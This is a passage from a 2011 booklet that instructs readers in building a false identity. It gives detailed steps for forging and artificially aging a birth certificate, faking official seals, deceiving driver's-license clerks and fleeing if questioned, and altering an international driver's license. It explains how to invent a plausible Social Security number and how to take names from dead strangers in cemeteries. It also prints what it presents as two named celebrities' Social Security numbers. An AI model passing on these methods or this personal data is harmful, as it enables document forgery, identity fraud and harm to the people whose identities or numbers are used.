white cloth). Before you leave, ask if they sell +corporate seals. Most larger rubber stamp firms do. +Two more details to go; it’s been a common practice for +several decades to use dark purple ink for the certification +stamp. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 64 - +Reproduction in any form is prohibited without written permission. + +It’s supposed to make the document more difficult to forge. +But by mixing equal portions of blue and red ink you can +create exactly the same color! +Mix the two inks well and pour the mixture over the white +stamp pad. You may have to add some black ink to the mix +to insure that the color of the impression is not too bright. +The ink on old documents often fades leaving a purple +impression rather dark. +Place the stamp at the same location as it appeared on the +original (probably above the verifying signature). If your +impression image isn't clean and crisp - it's not a problem as +most real BCs have smeared or incomplete stamps. One +note here: a completely perfect BC will seem odd and out of +place. +A birth certificate has no legal value at all without an official +"raised seal" that can be felt with the fingertips. This is +supposed to make the document impossible to forge as only +the issuing authorities have the proper seals. As always Nifty +has the answer. +The quickest and easiest approach is so simple it’s actually +funny! Go to a bank or coin store and buy an Eisenhower +dollar, Kennedy half-dollar or any other coin of that +approximate size. Be sure the coin you get is in uncirculated +condition or has little wear. Place the coin face down on a +firm surface, place the BC over the coin with the original seal +location placed directly over the coin. +Then rub the front surface of the BC with an eraser, your +finger or any other clean, soft object until a raised image +starts to appear on the BC. Keep rubbing until the full rim +and some of the center image appears. Most state laws only +require that the seal can be easily felt, not actually read. In +fact, most real BCs have very low-quality unreadable seal +images. Years of storage usually crush seal images, which +causes them to lose their sharpness and clarity leaving them +little more than a slightly raised smudge. +Avoid rubbing on the coin's lettering. The words "One Dollar" +would never appear on a real BC. Be sure you concentrate +only on the rim and center of the coin - this leaves a nice +round circular impression with a fuzzy image in the center. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 65 - +Reproduction in any form is prohibited without written permission. + +This simple technique will create a seal that will pass most +inspections (in fact, some clerks often forget to look for the +seal at all - most clerks will give the seal only a cursory +glance so readability is seldom an issue). Several genuine +birth certificates I've seen have seal images that are a circle +of little dots with a mushy image of some sort in the middle +with no legible text of any sort. +Some people are fussier demand a higher quality job. They +go back to the rubber stamp guy. If he sells corporate seals, +he'll have a catalog of different images that are available. +If you live in a large city and the stamp manufacturer is a big +outfit, a dozen or so seals will be hanging on the wall, +available for instant purchase. Otherwise you'll have to wait. +A nice large seal with no text can usually be purchase right +off the wall. Some designs look just like state seals. The cost +shouldn't be more than 20 or 30 bucks. Birth certificates +almost never have seals smaller than a half dollar with silver +dollar sized seals being the most common. +Seals the size of a quarter are commonly used as personal +seals that would appear very unusual on any official +document. When you use such a seal, place a few sheets of +paper behind the BC so that the image isn’t too sharp. Some +have found it useful to rub the resultant seal a bit to avoid it +looking too sharp. +The typewriter (whether old or new) can now be used to +enter information in the blanks on the blank BC form. Those +who have used this system recommend not using your real +birth date. Anyone who investigates your new ID will use the +date of birth (DOB) when searching databases. +To make your new birth date easy to remember, simply +move it backward or forward one month from your actual +birth date. Also, resist the temptation to make your new +identity younger than you really are. I know - I know, you +look younger than your age (everybody says that!). Trust +me, this could cause you problems later should it trigger +suspicion. +Enter the data about your new parents. (More on how to +locate your new parents later in the report) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 66 - +Reproduction in any form is prohibited without written permission. + +Remember old documents had phone numbers like +"Evergreen 2-1234", not the seven digit phone numbers we +use today. No area codes, no two letter state abbreviations +and no zip codes as all these only came into widespread use +in the 1970s. An address from the early 1950s might look +like "Miami 8, Florida" instead of today’s "Miami, FL 33068". +Unfortunately your new document will appear fresh and new. +To make it suitably old and weathered some have found it +useful to age the document by either leaving it out in the sun +(if it's in the summer) or lay it on a car seat or on a sunny +window sill during the day. This works well even in the +winter. Failing that you can use a sunlamp. (Don’t forget to +age both sides) +As a last resort, you can fire up your oven to around 300-325 +degrees and bake your BC for about 20-40 minutes. Cook it +in until it’s suitably aged. Some people have soaked the BC +in vinegar or tea to discolor it slightly. This last trick is so +common that some experienced clerks will actually sniff a +BC to see if they can detect the odor of coffee or vinegar. +Nifty recommends one last bit of trickery - brush the +document with some very fine steel wool, which will help it +look older also. +Fold and re-fold the BC until it starts to fall apart. Fold over a +corner so that it’s "dog-eared". Carry your BC in an +envelope. It’s a valuable document (you put a lot of work into +it, didn’t you?). Go to an office supply store and buy one of +those brown paper carriers that say "Important Documents" +on the side. +Recently I was visiting an art museum and noticed +something interesting in the corner of the main reception +area. There was a tall, slender vending machine that sold +custom stamped aluminum souvenir "coins". These +machines have been around for years and are usually found +in amusement parks and penny arcades. +The machine looks a bit like a one armed robber slot +machine. It has a display area on the front and a large +handle on the right you pull down to make an impression. +You point the dial on the front of the machine to the desired +letter you want imprinted on your coin and then pull the lever +down (all the way so you get a good impression). +© Copyright 2011, Ariza Research, All rights reserved - ABP - 67 - +Reproduction in any form is prohibited without written permission. + +When you are done you turn the dial to "I'm done" and your +customized coin is dropped into a bin at the bottom of the +machine. Cost: One dollar per coin. +Why would anyone be interested in such a silly little +souvenir? The customized printing is placed in an arc around +the bottom of the coin. Wouldn't such a coin with the letters +"Department of Vital Records" or perhaps "City of St. Louis" +be interesting? If someone wanted to, they could use such a +coin to create a very official looking impression on an official +document. (Using the technique described above). +This just goes to show - you have to keep your eyes open at +all times if you want to find the best techniques! +Drivers Licenses +If you’re young enough, explaining why you’re attempting to +get a new drivers license is easy. Past age 25 or so it gets a +bit more difficult. Women have it easier here. +Complete one of those driver-training programs (bring your +graduation certificate with you) and be prepared to discuss +your personal situation if you're asked. One guy I heard +about nervously claimed he needed a new driver’s license +because he had been in prison! +One friend I knew needed a new driver’s license because he +had been overseas working in Saudi Arabia (Saw’-Dee-A- +Ra’-bia) for the ARAMCO (A-Ram’-Co) Oil company and +only had an international AAA drivers license. +At this point it may be helpful to call your local drivers license +bureau. Ask them what documents you must bring with you +to secure a new drivers license. After they run through their +short list of difficult-to-obtain documents, ask if there are any +other documents they will accept. If you carefully review the +applicable rules of several states on this - you'll find that after +listing a short list of hard-to-get documents (like a passport) +they will include a sentence like "or any other document that +establishes age, residence or identity". +For example, the state law in New York includes the +following: "If the required documents are unavailable, a +supervisor will examine and approve other proofs." +© Copyright 2011, Ariza Research, All rights reserved - ABP - 68 - +Reproduction in any form is prohibited without written permission. + +They will also consider any document that "states your age +or address". +The Virginia requirements accept school transcripts "or any +other document that lists your full name and date of birth". +Also, several states will willingly accept expired ID provided +it hasn’t been expired too long. +A few states will even accept an apartment lease contract. +(Black lease agreement forms can be purchased at any +office supply store) Be persistent and keep asking for other +documents they’ll accept until you get the answer you want. +These clerks are often very overworked and bored so often +their sole motivation is to get you processed and back on the +street. +In most cases a good birth certificate along with a baptismal +certificate and maybe a library card should get you through if +you look and act right. Keep in mind that some states require +an auto inspection certificate and others also require proof of +insurance. Also ask what the fee is and be sure to bring +sufficient cash with you. +Update: Recently new legislation has been proposed +that would require more extensive documentation for +a driver’s license application. From our experience the +states that have tried to tighten up the application +process in this way have run into two problems. +First, any document they require can be obtained +without too much of a problem. And secondly, the +clerks in these offices are no geniuses. These new +more restrictive application requirements mean +nothing when they are administered by dimwitted +clerks who are unable or unwilling to critically +examine offered documents. +The only change that would really restrict driver +license access would be an online birth certificate +verification system which now seems at least seven to +tens years away. +Here are some details from a group down south. They prefer +to use a branch office, not the busy downtown headquarters. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 69 - +Reproduction in any form is prohibited without written permission. + +They park their car where it can’t be seen from the license +bureau front window. Around back or way out in the parking +lot would be best. Lunch hour on a weekday would be a +good time. Visit the place beforehand to check it out. Drive +by and check out the line. The busier it is – the better. +Some bureaus have several security guards while the +smaller ones don't bother. They walk in and ask for the study +guide for the written test. If they need to take a written test, +they study carefully for it, failing the test would be a real +disappointment. +Also note that 47 states have formed what is called "The +Drivers License Compact" which provides for the sharing of +driving violation information between their computers. +Georgia, Michigan and Kentucky have not yet joined but still +send violation info to other states. +If you have tickets in other states, don't plan on getting a +new license until the court is ready to allow it. The clerks at +the bureau are always on the lookout for DUI offenders +who’ve had their licenses revoked in nearby states. If the +clerk suspects anything, it will be that you are a DUI offender +seeking to get around your suspension. +What did the Boy Scouts teach you? BE PREPARED. Be +sure to memorize your parent's names, birth dates, places of +birth, occupations and particularly your mother’s maiden +name. +Some clerks will pull the following stunt. The clerk will take a +BC and hold it where you can’t see it and then ask you to +recite all or part of the information on it from memory. Be +ready for this. Study your new BC until you have it all +memorized. +Dress conservatively. If you’re a man: a nice blue suit +complete with a gold cross on the lapel (indicating church +membership) or at least a clean, freshly pressed less formal +outfit. If your hear is long, get it cut. If you’re a woman, dress +as though you’re an office manager or you’re on your way to +a job interview. You must look respectable but low-key. No +flashy clothes. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 70 - +Reproduction in any form is prohibited without written permission. + +Fit in. Your goal is to come and go without anyone ever +noticing you. If their suspicions are aroused, all they’ll have +to go by is your appearance, your behavior and your story. +It would be foolish for anyone to apply for a new license with +documents in their possession that list a different name. A +good tactic is to clean out your wallet or purse before arriving +at the bureau. +Have a baptismal certificate with you. Some have found it +useful to carry around some other "soft" ID like receipts with +your name on them; membership cards in private clubs or +other organizations. A library card is always a good bet as in +some areas it's widely respected. Receipts are another good +bet. +Here is how the bureaus usually handle social security +numbers. If an applicant were to apply using a made-up +social security number, a problem might occur. If the number +is from a distant state it won't probably cause this problem so +readily. If the applicant's social security number matches one +that's already in their database - the computer may "beep", +and notify the clerk of the match. +Users of this approach have used the following tactic. Write +down your new social security number on a slip of paper and +then store it away in your wallet or purse. +Then where the number is goes on the application form - +carefully switch the last two numbers. If the application sails +through with no number match, no problem. But if the +computer detects the match, the applicant can quickly +correct their error and complete the processing. +Most states require a social security number when you apply +for a driver’s license. A few, like New York, actually require +that you bring your social security card with you. An official +looking metal social security "card" can be purchased +through the mail. +One lady simply reported her social security card lost and +gave the DMV clerk her application as proof of her dilemma, +which was accepted no questions asked. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 71 - +Reproduction in any form is prohibited without written permission. + +Here’s an alternative to drivers’ licenses. Some states issue +official ID cards for people who don’t drive for check cashing +and general ID purposes. Some applicants suffer from +serious diseases that make it impossible for them to drive +(such as epilepsy). +This ID card has the same legal impact as a real drivers +license. The clerks seem to be less restrictive on their +scrutiny of ID documents when the applicant is only seeking +a state ID card. I suppose that's because they don't have to +worry about possible speeding ticket/DUI problems with a +simple ID card. +This tip is well known amongst Americans who live and work +overseas. An international driver’s license can be purchased +at any AAA office. This document, which looks like a little +booklet, can easily be taken apart; the name altered and +reassembled leaving the photo intact. There are those who +have used this simple document to open offshore bank +accounts and to obtain other ID documents. +Some users who ran into problems with their application +used this simple tactic to escape any further questions. They +said something like "look I can straighten this all out - I’ve got +my passport in my car, I’ll go get it for you." They move +toward the door and just keep moving. +If they try to force you into an interrogation room just mention +that you left your child (or dog) out in the car so just have to +go but you'll be right back. Unless an applicant has done +something clearly illegal you have a right to leave whenever +you like. +They might try to "urge" you to go to an interrogation room +by saying something like "come along, you’re creating a +scene". Smile warmly, look at your watch impatiently and +keep moving toward the door. If you have to, start getting a +little hysterical about your poor child baking out there in your +hot car. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 72 - +Reproduction in any form is prohibited without written permission. + +WARNING: An applicant who wanders into a license bureau +dressed in rags, looking like a bum (or a long haired, +drugged out generation Xer) and then presents the clerk with +suspicious looking ID documents can expect to be detained, +questioned and possibly arrested. None of this will happen if +you dress and act like a responsible and clean working +citizen. +The Numbers Game – The Social Security Number +System +This quick and easy system will not get you an original social +security number and a real social security card. Due to a +1984 federal anti-immigration law, all employers will insist on +seeing your genuine SSN card before you start work. If the +job includes medical benefits, the medical insurer will also +need an SSN. +Some identity changers have simply made up a fake number +and used it. But recent changes in the law can make this +illegal under certain circumstances (I'd list them for you but +they're changing so fast no one can keep track) +There are those who purchase a fake social security card on +the street in any large city. A piece on the popular CBS show +"60 Minutes" highlighted the ease with which they can be +purchased. Unfortunately the purchase is illegal and +chances are excellent that the card you get will be stolen or +just a copy of a stolen document. This approach is seldom +worthwhile. +The social security system is a typical large paper-shuffling +government agency. It may be difficult to get them to send +you a new card - but it’s not impossible. +Here is a detailed explanation of the social security +numbering system. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 73 - +Reproduction in any form is prohibited without written permission. + +A Social Security Number has three separate parts each +separated by a hyphen. +123 45 6789 +Area Group Serial +Number Number Number +The first three numbers are called the "area number" and +indicate the geographical area of issue. They follow the +following scheme: +Area Numbers +001-003 NH 400-407 KY 530 NV +004-007 ME 408-415 TN 531-539 WA +008-009 VT 416-424 AL 540-544 OR +010-034 MA 425-428 MS 545-573 CA +035-039 RI 429-432 AR 574 AK +040-049 CT 433-439 LA 575-576 HI +050-134 NY 440-448 OK 577-579 DC +135-158 NJ 449-467 TX 580 VI (Virgin Islands) +468-477 +159-211 PA 581-584 PR (Puerto Rico) +MN +212-220 +478-485 IA 585 NM +MD +486-500 +221-222 DE 586 PI (Pacific Islands) +MO +223-231 VA 501-502 ND 587-588 MS +232-236 +503-504 SD 589-595 FL +WV +237-246 NC 505-508 NE 596-599 PR (Puerto Rico) +247-251 SC 509-515 KS 600-601 AZ +252-260 GA 516-517 MT 602-626 CA +261-267 FL 518-519 ID 627-645 TX +268-302 OH 520 WY 646-647 UT +303-317 IN 521-524 CO 648-649 NM +318-361 IL 525 NM +362-386 MI 526-527 AZ +387-399 WI 528-529 UT +650-699 Unassigned - Reserved for future use +700-728 Used by railroad workers until 1963 - No +longer used +© Copyright 2011, Ariza Research, All rights reserved - ABP - 74 - +Reproduction in any form is prohibited without written permission. + +729-999 Unassigned - Reserved for future use +Choose an area number from a distant state to avoid +duplication problems with a genuine local number that might +appear in state compute databases. +The area numbers are assigned from low to high. The two +middle numbers, the "group numbers" are assigned in a +tricky sequence as follows: +1. Odd number pairs from 01 to 09 then +2. Even number pairs from 10 to 98 then +3. Even number pairs from 02 to 08 then +4. Odd number pairs from 11 to 99 then onto the next higher +area number +Let’s take Texas as an example. They began issuing +numbers with 627-01-0001 and proceeded to +627-09-9999. After that group series (01-09) was exhausted +they moved on to 627-10-0001 to +627-98-9999. then 627-02-001 etc... Get the idea? Also, a +SSN that has any of the three groups equal to all zeroes is +invalid. +Each month the social security people publish a list of the +latest numbers issued listed as an aid to those who need to +be able to spot fake numbers. If a number is too high, it’s a +fake. Note: Before 1965 only odd group numbers below 10 +and even numbers above nine were used. +If you choose a number in a low series, you will fall below +the latest number issued and you will then have a number +that appears genuine. However, the lower you go the greater +the chance you will be sharing someone else’s number. +You should also be aware that anything you do with +another's number could mess up an innocent person’s life. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 75 - +Reproduction in any form is prohibited without written permission. + +And another problem, this other person may not be a nice +person; in fact he/she may be a wanted criminal or may have +a terrible credit history. Dead person’s numbers are re- +issued after a year’s delay. +If you desire to get a proper job or open a bank account or +safety deposit box, you’ll need a clean, new social security +number. I won’t lie to you, the government has made this by +far the most difficult part of building a virgin identity. Here are +some tactics others have described using. +Before opening a bank account you need to know that most +banks use an on-line computerized system that that confirms +the number has been issued, the year of issue, the place of +issue and if the number has been used for bank fraud or +insufficient funds use during the past five years. +CheXSystem (of Dallas, Texas) is the largest system. +They’re information is covered by the Fair Credit Reporting +Act so you can get a copy of your report directly from them if +you suspect any problems. +Here's a bit of interesting trivia. Way back in 1946 a major +wallet manufacturer began placing fake paper social security +cards in each of the wallets they made. To make them look +real they placed the SSN 078-05-1120 on each card. Over +the years over four thousand different people have used this +number! +There is little chance that a clerk or retail person will +recognize this number as a fake but any federal official will +recognize it as a fake immediately should it pass across their +desk. I use give out this number to snoopy people who have +no legal right to ask for my number. +The social security administration has requested that +commercial firms and Hollywood use numbers in the series +from 987-65-4320 to 987-65-4329 in their advertising and +movies. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 76 - +Reproduction in any form is prohibited without written permission. + +Just for giggles here are two interesting social security +numbers. Please don't abuse this information. +Bill Gates (Computer Mogul): 539-60-5125 +Ted Turner (Media Mogul): 253-56-8877 +My Story +About a decade ago I became interested in compiling my +family history. Starting with my Grandparents, I started +collecting information by searching through birth and death +records for more information. I did it part time as a hobby. +As I became more experienced, others began to seek me +out for guidance on how they could conduct research into +their families. Over time I gradually gained a reputation as +something of an expert on the acquisition of birth and death +information. +One day, out of the blue, a co-worker approached me with a +very unusual request. She was at her wits end. She came to +me because of my experience with birth and death +documents. Her ex-husband had beaten and raped her +several times and as if that wasn’t bad enough, he began +sexually molesting their 12-year-old daughter. When she +protested, she was beaten so badly she spent a full month in +the hospital. +Now, after their divorce, he was stalking her and brazenly +threatening her life and the life of her daughter. Restraining +orders were of little use. She had him arrested several times +but he always managed to talk his way out of jail in a day or +two. +And each time she received a particularly vicious beating for +her efforts. In an attempt to lose him for good, she moved +twice in three years. Unfortunately, through the services of +an experienced private investigator, he was always able to +locate her through her social security number. +The last time she moved she had her lease and all her +utilities put in a friend’s name. But once again, even after all +her efforts he managed to find her in less than three months! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 77 - +Reproduction in any form is prohibited without written permission. + +Problem was, she had to work for a living and each new +employer was required by law to obtain her social security +number. He ex could then find her through her work record. +But what could she do? Wherever she moved she had to +work? +Finally, in desperation, she appealed to the social security +administration for a change in her social security number. +She and her daughter sat there and wept as she told her sad +and painful story to a heartless clerk who listened with a +stone face. +Two weeks later she received a form letter. They found her +problem was "not sufficiently compelling" to allow a number +change! +Then one night, she saw a gangster movie about a man who +had "informed" on the mob. He ended up with a new identity +furnished by the federal witness protection program. She +quickly realized that the creation of a virgin identity, complete +with a new social security number was the only way she +would ever get really free of her ex. She begged me to help +her. I told her that, though I sympathized with her, I wasn’t +sure there was anything I could do for her. I told her that +such a project would be difficult and besides - I wasn’t sure +we could pull it off without breaking some laws. +Her response was simple. If she couldn’t lose her ex - she +would be forced to kill him!. She had purchased a gun, and +though she had no idea how to use it, she was determined to +protect herself and her daughter. If you could have seen the +look in her eyes you would have know, as I did, that this was +a truly desperate lady who really meant what she said! I +promised to help her if she promised not to shoot anyone! +It took us a while as we had many lessons to learn along the +way. But after she had her new identity, she moved one last +time and was finally able to permanently dump her +tormentor. Two years later she has completely rebuilt her life +without fear of her ex showing up on her doorstep. (She still +has her gun though!) Oh I’m sure he’s still looking for her, +but now she has a new social security number so he’s just +wasting his time and money. +Since that time we’ve helped many people in distress create +completely new identities and get a second chance at life. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 78 - +Reproduction in any form is prohibited without written permission. + +This report contains everything we’ve discovered along the +way. +As each person’s situation is unique, I’ve also included some +rather unusual optional strategies that may or may not be +useful to you. I’ve even included a few ideas that occurred to +us but for one reason or another were never actually used! +On the first read-through you’ll probably find all this a bit +confusing. Be patient. After several readings it’ll all begin to +make sense. To help simplify things, I’ve summarized +procedures in easy-to-read lists. +A Lesson in Law +Nothing in this report is to be regarded as legal advice. The +laws regarding the acquisition and use of identity documents +are constantly changing. But I will provide you with one small +nugget of free legal advice. +Often the difference between a legal act and an illegal one +has to do with the individual's intent. While it may be legal to +carry a concealed gun into a bank, it's clearly a federal +felony to carry the same gun into a bank with the intent of +committing a bank robbery. The difference is intent. +According to the Supreme Court, the act of creating an +alternative identity is not, in itself, an illegal act. However, if +you're seeking to establish a new identity to evade the long +arm of the law or fraudulently apply for government benefits, +you'll be committing a very serious crime. +Banking Precautions +MSNBC recently ran an interesting report, which exposed +some very serious weaknesses in our banking system. As +part of an investigation, journalists attempted to open +checking accounts in fake names at several New York City +banks. One of their female employees opened accounts at +eleven out of twelve different banks using only her MSNBC +employee identification card! +© Copyright 2011, Ariza Research, All rights reserved - ABP - 79 - +Reproduction in any form is prohibited without written permission. + +Only Citibank turned her away (they said her work ID card +was a secondary form of ID and they require at least one +"primary" ID document). All the other banks offered to make +an exception and open an account for her. +The message here is simple. This lady had a good story and +looked very professional - just the kind of lady who would +work in such a place. +Eleven out of twelve bankers went ahead and opened an +account for her. These bank people were so sloppy that she +was able to open three accounts using the name "Minnie M. +Mouse"! +Also, the work ID was a slick-looking, multi-color badge that +impressed the bank officials despite the obviously silly name. +Another important factor was the woman's appearance. She +appeared to be around 40, extremely well groomed and +dressed. +She looked exactly like you'd expect the employee of a +major television network to look. A nice business suit with +some understated jewelry and a very stylish yet conservative +winter coat. She looked and acted the part so she got the +benefit of a doubt. +Then to add insult to injury, our illustrious investigator +passed a number of obviously bogus checks with ease. +Several checks were photocopies with "VOID" all over them. +Several had "Do Not Cash - This Check is a Counterfeit!" +printed across the top. +One was signed "Bill Clinton" and another "Donald D. Duck" +and still they were cashed! All of the checks (but one) were +cashed. The one teller who refused a bogus check did so +because she recognized the TV reporter and so gave her +check extra scrutiny. +Of course the real motive of the program was to justify +tightening up the entire banking system. The bankers are +experimenting with retinal scanning, fingerprint scanning and +even DNA identification. The system is pretty much wide +open these days. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 80 - +Reproduction in any form is prohibited without written permission. + +Any good banker will tell you that bankers are less careful +these days because the IRS now allows banks to write off +fraud losses much more easily than in the past. And since +they don't stand to lose as much as before, they're not nearly +as careful. +Another news story involved a man who stole huge checks +from a fortune 500 company. The smallest check was for +over $18,000. The thief then sent the stolen checks to his +credit card companies as payments. What do you think +happened? Every single firm accepted the bogus checks +and credited his account. +Of course each check was made out to some other firm but +that didn't stop the banks from accepting them. Their greed +must have overwhelmed their fear. +Careful Banking +At first identity changers need to be careful about their +banking use early on. Later when their identity is better +established they can live more normal financial lives. +Those who have recently changed their identities usually +begin by opening a new bank account with around $250 in +cash. Be sure you open a non-interest bearing account like a +routine checking account. If the account earns even a single +dollar of interest the IRS will need to be notified. If the bank +clerk asks, be ready to bark out your social security number +confidently. +Any checks deposited to the new account will leave paper +trails. (When requesting birth certificates, pay with money +orders, not with checks.) At first identity changers usually +avoid visiting the lobby of the bank instead they conduct all +their banking through the ATM machines that are usually +located outside. They pay their bills with money orders +purchased from various sources including convenience +stores but not from their bank. +Here is a way to quickly establish some credit when you're +new in town. They open an account at a local credit union or +savings and loan. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 81 - +Reproduction in any form is prohibited without written permission. + +They deposit cash and then wait two months or so and then +approach the institution for a loan fully secured by the new +account. Such a loan is almost always approved, usually +automatically. +After they've made several payments (on time) the +transactions will trigger the credit agencies to open an +account in their name and start collecting information on +their financial dealings. +This lays the foundation for later building a solid credit rating. +Finance or commercial store-front loan companies have a +bad reputation and people in the financial community know +that only low-life high risk customers would deal with these +places. +When it's time to go for an unsecured credit card, it's always +best to submit an application towards the end of November +as banks shift into high gear then in anticipation of increased +profits from holiday spending. +When the card is received, it's best to make a few +purchases, run up a moderate balance. Then apply for +another card in three months and in a year or so you should +have excellent credit. +Be Careful! +I stood behind a girl in a bank line who was opening a +checking account. She handed her application card to the +clerk who picked up the phone, dialed an 800 number, and +entered an access code and then the girl’s SSN. She +listened carefully and then stared at the girl with a stony +expression on her face. +She then put the phone down and handed the card back to +the applicant and said "thank you for your interest in opening +account with our bank but unfortunately we are unable to +open an account for you at this time - next!" The number the +bank lady called provides a service that provides the name +of the individual to whom the social security number was +issued. Obviously the name didn't match the girl’s name. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 82 - +Reproduction in any form is prohibited without written permission. + +The "Quick and Easy" Checklist +- Obtain your own genuine birth certificate +- Buy cover up tape and liquid paper +- Mask out the original text to create blank +form +- Make copies of the new blank form +- Rent or buy an older typewriter and ribbon +- Type up new birth certificate with your new +name +- Make a copy +- Apply new stamp (optional) +- Artificially age the BC with +coffee/tea/vinegar or sunlight +- Forge a baptismal certificate (optional) +- Make up a new social security number from +a distant state +- Use your BC to get a new DL +The "Slow & Hard" Way +The users of this approach say it's much more difficult and +time-consuming but creates a new virgin identity that will +withstand even the most intensive scrutiny. Just try to think +of all this as a challenging game in which you’re going to +"beat the system". +If you need to obtain a new social security number and/or +need a passport in your new name, this is the only method +that will achieve those goals. I've heard of people getting +new social security numbers with forged birth certificates and +faked parents but if you attempt it, I’d bet against you and +know that you'll be breaking several rather serious laws. +Until recently passports were only issued after the +applicant's birth certificate was verified with the issuing +authority. According to US State Department officials this +practice is being abandoned. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 83 - +Reproduction in any form is prohibited without written permission. + +Given the dramatic increase in the number of international +travelers and the low-tech nature of most vital records +offices, several identity-changers have reported that they've +obtained US passports using forged birth certificates that +couldn't possibly pass any kind of verification. Several recent +articles have appeared in the media that seemed to verify +this trend though I expect requirements to be tighter over the +next few years. +First, make up a new birth date for your new identity. Do not +use your actual birth date! Doing this would create too +obvious a link between the two identities. +The next step involves the location of a new set of parents +(deceased of course). There are several ways to locate +these new parents. We’ll start with the easiest method. +Finding Your New “Folks” +The information users of this system need can be found +either in a small local cemetery or in the obits in your local +paper. Next to the obits should be a column of ads under the +heading of "burial plots" which provides a list of cemeteries. +Try to find the smallest, most remote one you can find that +has been burying people for the last few decades. +Remember, old historical cemeteries full of dead people are +of interest only to historians. +The next step is to do some simple math. +Your Birth Year 1968 +Minus 40 1928 +Minus 17 1951 +So a new mother must have been born between the years +of 1928 and 1951 and have lived until your new birth date. +Now for good old Dad: +Your Birth Year 1968 +Minus 55 1913 +Minus 17 1951 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 84 - +Reproduction in any form is prohibited without written permission. + +Your new father must have been born between 1913 and +1951 and have lived until 9 months before your new birth +date. +Your Birth Mother’s Father’s Birth +Date Birth Range Range +1980 1940-1963 1925-1963 +1970 1930-1953 1915-1953 +1960 1920-1943 1905-1943 +1950 1910-1933 1895-1933 +1940 1900-1923 1885-1923 +1930 1890-1913 1875-1913 +Unfortunately, finding new parents is much easier if you’re +older rather than younger. An 18-year old will have a +considerable problem finding suitable parents. +It's best to visit a cemetery wearing good walking shoes on a +dry day if possible. The best names can usually be found +near the largest monuments where family plots can be +found. Find three sets of new parents whose births and +deaths fall within the ranges you calculated. +When you do, write down all the information the headstone +contains. Complete names including full middle names are +better than names with middle initials only. The ideal plot will +be a small family plot well away from the main path would be +best. +Many cemeteries have overgrown areas where, sadly, no +visitors have come to clean up their graves. A completely +overgrown headstone that is buried under weeds would be +best. +Users of this system report that common surnames are best +and they avoid oddball highly ethnic last names like +"Kramarzinski". Names that were in common use around the +time of your childhood would be more credible. For example +twenty years ago "Jennifer" became a very popular first +name due to a popular TV show. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 85 - +Reproduction in any form is prohibited without written permission. + +If your ethnic origins are obvious, you’ll have to limit your +search to surnames that match your face. Try to find a +cemetery that contains as many of "your people" as +possible. Perhaps a cemetery in a matching ethnic +community would be best. +Each cemetery has an official "record-keeper". Their records +are often so comprehensive and complete that all the +information you need can be obtained right there on the +spot, or they may be completely useless, continually +unavailable or just plain uncooperative. +Those who are doing family research often search out record +keepers for more detailed information. They may hint that a +contribution would be appreciated so please be generous. (I +once had an old-lady smugly wave an empty pickle jar +labeled "Contributions" in my face when I asked for +information!) +Be warned that the record keeper may launch into a sales +pitch for burial plots. Get whatever info you can but keep in +mind that the key piece of information you need at this point +is your new mother’s maiden name. +Another system for discovering a deceased woman's maiden +name is as follows. Drive to the largest library you can find. +A smaller suburban library may have everything you need. +Call them and ask if they have the biggest newspaper in +town on microfilm and do their records go back to your new +parent’s birth period. +When you get there, ask the reception librarian where the +newspaper records are kept. Pull the microfilm rolls for the +death dates of each of your prospective new parents. Take +plenty of small change with you so you can make copies of +the obits you find. You will not find all the obits you seek. +People die and are shipped across state lines all the time. +This is why I asked you to get several sets of prospective +parents. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 86 - +Reproduction in any form is prohibited without written permission. + +Getting Help – from a Church! +Grab your yellow pages and look under churches - yes +churches! Find the nearest Mormon Church. It may be listed +under "Churches of Jesus Christ of Latter Day Saints" Yes, +those nice Mormons are going to help you get a new ID! Call +them up. +Ask them if they have a "Family History Center" in their +church. If not, find out where the nearest "Family History +Center" is and pay them a visit. Take a pad, a pen and a +pocket full of dimes and quarters for the copy machines. +Once again your appearance is important. Dress nice and +act nice. Go during the day on a weekday to avoid the rush. +The place can be a real zoo evenings and Saturdays. It’s not +uncommon to have to wait an hour or more just to get +access to one of the viewing machines. If you arrive mid-day +on a weekday you should have the whole place to yourself. +What you need will probably take several hours to find so +arrive early after a full meal. (I usually take some cookies to +munch on in a paper bag in my brief case!) +When you get there chat with the volunteer (usually a nice +old lady) on the information desk. They can be quite helpful. +Tell them you’re doing a little genealogy research (checking +up on your family roots). Ask to see the family histories. +These are family trees compiled by professional +genealogists and can be as useful as a cemetery when +seeking new parents. +All the same birth and death time frames apply. Scan the +family trees for the most recent ones. Again old information +won’t help us a bit. +The previous two methods are easier than searching the +death records but many have found the following useful so +I’ve included it. Ask to see the death records (not the social +security death records). The Mormon Church has, over the +years, assembled the largest death record database in the +world. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 87 - +Reproduction in any form is prohibited without written permission. + +Their death files are organized by state. Search one state +until you find what you need. Then grab another state etc.. +This - will - take - time! The records are huge and most of +these people lived far too long ago to be of use to you. +Avoid searching the most populous eastern states and +Nevada, Colorado and California. The other western and +plains states are best. They have fewer and easier +restrictions on issuing new birth certificates. +Getting a new BC issued in New York City or Los Angeles is +all but impossible. In the large cities you can expect to find +the public records sealed to all but attorneys and +professional licensed genealogists. Of course the excuse +given for these illegal restrictions is their desire to limit +welfare cheating. +Cruise the records looking for a married couple who were +wed a year or two before you were really born. When you +find a suitable pair, make a copy to capture the information +and be sure the copy is fully readable. Go on to the next +state’s records. +Make up your new name complete with your new last name +taken, of course, from your new parents. +Mail a hand-written note to the bureau of vital records for the +states/counties where your new parents lived. Tell them that +you need a BC as you need it to apply for a government +security clearance. +This is a common request. Ask them to please hurry as you +can’t start work until you get your BC. People who request a +BC because they are "doing some family research" will often +find themselves at the bottom of the stack priority-wise. +Several professional genealogists have told me 